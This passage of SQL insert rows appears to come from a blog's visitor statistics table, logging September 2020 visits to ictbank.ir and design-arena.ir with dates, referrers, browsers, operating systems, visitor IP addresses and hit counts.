(4668,'2020-09-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','64.111.106.179','000',0,1,0),
(4669,'2020-09-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','202.44.8.48','000',0,1,0),
(4670,'2020-09-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','67.43.7.162','000',0,1,0),
(4671,'2020-09-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.5','000',0,1,0),
(4672,'2020-09-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.141','000',0,1,0),
(4673,'2020-09-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','81.27.85.195','000',0,1,0),
(4674,'2020-09-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','203.205.21.159','000',0,1,0),
(4675,'2020-09-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.46.206','000',0,1,0),
(4676,'2020-09-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','187.73.192.205','000',0,1,0),
(4677,'2020-09-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.10','000',0,1,0),
(4678,'2020-09-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','97.74.24.188','000',0,1,0),
(4679,'2020-09-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','64.20.53.82','000',0,1,0),
(4680,'2020-09-04','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','192.241.131.189','000',0,1,0),
(4681,'2020-09-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(4682,'2020-09-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(4683,'2020-09-04','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','95.217.207.28','000',0,1,0),
(4684,'2020-09-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.234.217.216','000',0,1,0),
(4685,'2020-09-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','103.149.192.116','000',0,1,0),
(4686,'2020-09-05','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','95.217.207.28','000',0,1,0),
(4687,'2020-09-05','http://design-arena.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','54.36.113.142','000',0,1,0),
(4688,'2020-09-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.196.23.220','000',0,1,0),
(4689,'2020-09-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','80.82.68.59','000',0,1,0),
(4690,'2020-09-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(4691,'2020-09-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.77.93','000',0,1,0),
(4692,'2020-09-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.48.155','000',0,1,0),
(4693,'2020-09-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(4694,'2020-09-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.245.21.94','000',0,1,0),
(4695,'2020-09-05','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','23.228.109.146','000',0,1,0),
(4696,'2020-09-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(4697,'2020-09-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(4698,'2020-09-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(4699,'2020-09-05','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','27.115.124.6','000',0,1,0),
(4700,'2020-09-05','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.180.231.107','000',0,1,0),
(4701,'2020-09-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(4702,'2020-09-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.196.24','000',0,2,0),
(4703,'2020-09-06','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.180.231.107','000',0,1,0),
(4704,'2020-09-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.180.121.3','000',0,2,0),
(4705,'2020-09-06','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','103.214.21.124','000',0,1,0),
(4706,'2020-09-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.157.128.190','000',0,1,0),
(4707,'2020-09-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(4708,'2020-09-06','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','120.24.212.12','000',0,2,0),
(4709,'2020-09-06','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','45.131.93.111','000',0,1,0),
(4710,'2020-09-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.153.227','000',0,1,0),
(4711,'2020-09-06','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(4712,'2020-09-06','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','49.234.37.38','000',0,2,0),
(4713,'2020-09-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.159.107.167','000',0,1,0),
(4714,'2020-09-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.81.219','000',0,1,0),
(4715,'2020-09-06','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','39.99.160.90','000',0,1,0),
(4716,'2020-09-06','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','174.76.35.9','000',0,1,0),
(4717,'2020-09-06','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','72.223.168.76','000',0,1,0),
(4718,'2020-09-06','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','45.117.82.166','000',0,2,0),
(4719,'2020-09-06','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','207.246.249.206','000',0,2,0),
(4720,'2020-09-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(4721,'2020-09-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(4722,'2020-09-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(4723,'2020-09-07','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','129.226.49.27','000',0,1,0),
(4724,'2020-09-07','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','149.202.67.223','000',0,1,0),
(4725,'2020-09-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.126.240.108','000',0,1,0),
(4726,'2020-09-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,6,0),
(4727,'2020-09-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.145.13.186','000',0,1,0),
(4728,'2020-09-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','94.102.49.193','000',0,1,0),
(4729,'2020-09-07','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','51.255.150.121','000',0,1,0),
(4730,'2020-09-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.42.15.25','000',0,1,0),
(4731,'2020-09-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.159.37.33','000',0,1,0),
(4732,'2020-09-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.38.81.231','000',0,1,0),
(4733,'2020-09-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.164.183.100','000',0,1,0),
(4734,'2020-09-07','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','64.137.120.210','000',0,2,0),
(4735,'2020-09-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(4736,'2020-09-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(4737,'2020-09-07','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','180.163.220.3','000',0,1,0),
(4738,'2020-09-07','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','104.236.75.170','000',0,1,0),
(4739,'2020-09-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.31','000',0,2,0),
(4740,'2020-09-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,6,0),
(4741,'2020-09-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.158.221.239','000',0,1,0),
(4742,'2020-09-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','49.12.126.16','000',0,11,0),
(4743,'2020-09-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.246.224.13','000',0,3,0),
(4744,'2020-09-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','64.21.98.47','000',0,1,0),
(4745,'2020-09-08','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','139.196.229.151','000',0,1,0),
(4746,'2020-09-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','195.66.114.153','000',0,1,0),
(4747,'2020-09-08','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','193.70.102.148','000',0,1,0),
(4748,'2020-09-08','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','62.210.124.171','000',0,1,0),
(4749,'2020-09-08','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','212.83.147.249','000',0,1,0),
(4750,'2020-09-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.68.7.13','000',0,1,0),
(4751,'2020-09-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.196.17.180','000',0,1,0),
(4752,'2020-09-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.24.235','000',0,1,0),
(4753,'2020-09-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(4754,'2020-09-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(4755,'2020-09-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(4756,'2020-09-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(4757,'2020-09-09','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','89.248.172.208','000',0,1,0),
(4758,'2020-09-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.196.105.0','000',0,1,0),
(4759,'2020-09-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.214.194.139','000',0,1,0),
(4760,'2020-09-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.39.196','000',0,1,0),
(4761,'2020-09-09','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.99','000',0,1,0),
(4762,'2020-09-09','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','191.103.8.163','000',0,1,0),
(4763,'2020-09-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','34.123.88.47','000',0,1,0),
(4764,'2020-09-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,6,0),
(4765,'2020-09-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(4766,'2020-09-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.222.66.193','000',0,18,0),
(4767,'2020-09-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.159.211.51','000',0,1,0),
(4768,'2020-09-09','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','62.99.78.120','000',0,1,0),
(4769,'2020-09-09','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','122.70.158.79','000',0,1,0),
(4770,'2020-09-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','159.69.58.136','000',0,1,0),
(4771,'2020-09-09','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','104.197.22.134','000',0,1,0),
(4772,'2020-09-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','34.69.182.149','000',0,1,0),
(4773,'2020-09-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','74.91.16.210','000',0,1,0),
(4774,'2020-09-09','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','185.180.12.57','000',0,42,0),
(4775,'2020-09-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(4776,'2020-09-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(4777,'2020-09-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','82.102.12.160','000',0,2,0),
(4778,'2020-09-09','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(4779,'2020-09-10','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','222.249.173.26','000',0,3,0),
(4780,'2020-09-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.0.192.20','000',0,2,0),
(4781,'2020-09-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.93.183.131','000',0,1,0),
(4782,'2020-09-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.88.175.141','000',0,1,0),
(4783,'2020-09-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.136.105','000',0,1,0),
(4784,'2020-09-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','84.21.170.210','000',0,1,0),
(4785,'2020-09-10','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','178.62.74.6','000',0,1,0),
(4786,'2020-09-10','https://www.google.com/','Chrome','OS X','10.14.6',NULL,NULL,'','213.127.100.77','000',0,1,0),
(4787,'2020-09-10','http://ictbank.ir/blog','Firefox','Unknown','Unknown',NULL,NULL,'','124.206.180.133','000',0,1,0),
(4788,'2020-09-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.5.39','000',0,1,0),
(4789,'2020-09-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.153.199.13','000',0,1,0),
(4790,'2020-09-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(4791,'2020-09-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(4792,'2020-09-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(4793,'2020-09-10','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','208.100.26.229','000',0,1,0),
(4794,'2020-09-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,6,0),
(4795,'2020-09-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(4796,'2020-09-11','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','74.91.23.74','000',0,1,0),
(4797,'2020-09-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.157.176.247','000',0,1,0),
(4798,'2020-09-11','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','152.136.202.64','000',0,3,0),
(4799,'2020-09-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(4800,'2020-09-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.208.163.198','000',0,1,0),
(4801,'2020-09-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.146.164','000',0,1,0),
(4802,'2020-09-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.5','000',0,1,0),
(4803,'2020-09-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','94.23.196.86','000',0,1,0),
(4804,'2020-09-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','97.74.24.205','000',0,1,0),
(4805,'2020-09-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.180.120.61','000',0,1,0),
(4806,'2020-09-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.38.227.167','000',0,1,0),
(4807,'2020-09-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.44','000',0,1,0),
(4808,'2020-09-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','75.103.66.9','000',0,1,0),
(4809,'2020-09-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','46.242.145.16','000',0,1,0),
(4810,'2020-09-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.197.140','000',0,1,0),
(4811,'2020-09-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.120.237.114','000',0,1,0),
(4812,'2020-09-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.139.70.135','000',0,2,0),
(4813,'2020-09-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.237.172','000',0,1,0),
(4814,'2020-09-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(4815,'2020-09-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(4816,'2020-09-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(4817,'2020-09-12','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','219.151.143.12','000',0,3,0),
(4818,'2020-09-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.125.40.139','000',0,1,0),
(4819,'2020-09-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,6,0),
(4820,'2020-09-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(4821,'2020-09-12','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','60.246.1.146','000',0,1,0),
(4822,'2020-09-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.209.106','000',0,1,0),
(4823,'2020-09-12','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','59.125.2.63','000',0,1,0),
(4824,'2020-09-12','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','103.145.13.13','000',0,1,0),
(4825,'2020-09-12','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','35.239.143.173','000',0,1,0),
(4826,'2020-09-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.123.231.79','000',0,1,0),
(4827,'2020-09-12','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','52.255.172.144','000',0,1,0),
(4828,'2020-09-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.41.67','000',0,1,0),
(4829,'2020-09-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','184.154.74.66','000',0,1,0),
(4830,'2020-09-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(4831,'2020-09-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(4832,'2020-09-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','153.122.170.20','000',0,2,0),
(4833,'2020-09-12','http://82.102.9.14/blog/','Internet Explorer','Windows','5.1',NULL,NULL,'','153.174.213.153','000',0,1,0),
(4834,'2020-09-12','http://82.102.9.14/blog/','Internet Explorer','Windows','5.1',NULL,NULL,'','153.227.145.34','000',0,1,0),
(4835,'2020-09-13','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','6.3',NULL,NULL,'','185.94.192.83','000',0,2,0),
(4836,'2020-09-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.125.4.199','000',0,1,0),
(4837,'2020-09-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(4838,'2020-09-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.17.3.88','000',0,1,0),
(4839,'2020-09-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(4840,'2020-09-13','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(4841,'2020-09-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.213.28','000',0,1,0),
(4842,'2020-09-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.27.57','000',0,2,0),
(4843,'2020-09-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.127.235.170','000',0,1,0),
(4844,'2020-09-13','http://design-arena.ir/blog','Chrome','Android','5.1.1',NULL,NULL,'','35.239.143.173','000',0,2,0),
(4845,'2020-09-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.217.41','000',0,1,0),
(4846,'2020-09-13','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','222.249.173.26','000',0,3,0),
(4847,'2020-09-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(4848,'2020-09-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(4849,'2020-09-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(4850,'2020-09-13','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(4851,'2020-09-13','www.google.com','Unknown','Android','7.0',NULL,NULL,'','51.91.151.69','000',0,1,0),
(4852,'2020-09-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(4853,'2020-09-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.159.129.54','000',0,1,0),
(4854,'2020-09-14','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','123.206.183.186','000',0,3,0),
(4855,'2020-09-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(4856,'2020-09-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.146.214','000',0,1,0),
(4857,'2020-09-14','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','185.248.186.120','000',0,1,0),
(4858,'2020-09-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.182.210.34','000',0,1,0),
(4859,'2020-09-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.124.2.255','000',0,1,0),
(4860,'2020-09-14','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','199.244.88.132','000',0,1,0),
(4861,'2020-09-14','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Opera','Windows','6.1',NULL,NULL,'','45.141.156.25','000',0,2,0),
(4862,'2020-09-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.67.183','000',0,1,0),
(4863,'2020-09-14','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','123.207.31.240','000',0,2,0),
(4864,'2020-09-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(4865,'2020-09-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(4866,'2020-09-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(4867,'2020-09-14','www.google.com','Unknown','Android','7.0',NULL,NULL,'','51.91.151.69','000',0,1,0),
(4868,'2020-09-14','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','185.46.116.42','000',0,1,0),
(4869,'2020-09-14','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','200.48.54.138','000',0,1,0),
(4870,'2020-09-15','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','104.248.236.204','000',0,1,0),
(4871,'2020-09-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.158.135.153','000',0,1,0),
(4872,'2020-09-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(4873,'2020-09-15','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','118.163.135.18','000',0,1,0),
(4874,'2020-09-15','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','82.102.210.242','000',0,1,0),
(4875,'2020-09-15','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.186','000',0,6,0),
(4876,'2020-09-15','http://ictbank.ir/blog','Safari','OS X','10.12.3',NULL,NULL,'','45.63.11.12','000',0,1,0),
(4877,'2020-09-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.6.41','000',0,1,0),
(4878,'2020-09-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','64.20.53.82','000',0,1,0),
(4879,'2020-09-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.16','000',0,1,0),
(4880,'2020-09-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.153.28','000',0,1,0),
(4881,'2020-09-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','67.227.241.68','000',0,1,0),
(4882,'2020-09-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.9','000',0,1,0),
(4883,'2020-09-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.180.123.24','000',0,1,0),
(4884,'2020-09-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.154.178.122','000',0,1,0),
(4885,'2020-09-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.22','000',0,1,0),
(4886,'2020-09-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.194.52','000',0,1,0),
(4887,'2020-09-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','97.74.24.95','000',0,1,0),
(4888,'2020-09-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.197.17','000',0,1,0),
(4889,'2020-09-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','67.213.82.137','000',0,1,0),
(4890,'2020-09-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.192.48.43','000',0,1,0),
(4891,'2020-09-15','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.154.47.2','000',0,1,0),
(4892,'2020-09-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.166.137.80','000',0,1,0),
(4893,'2020-09-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','156.96.112.211','000',0,1,0),
(4894,'2020-09-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','195.66.114.153','000',0,1,0),
(4895,'2020-09-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
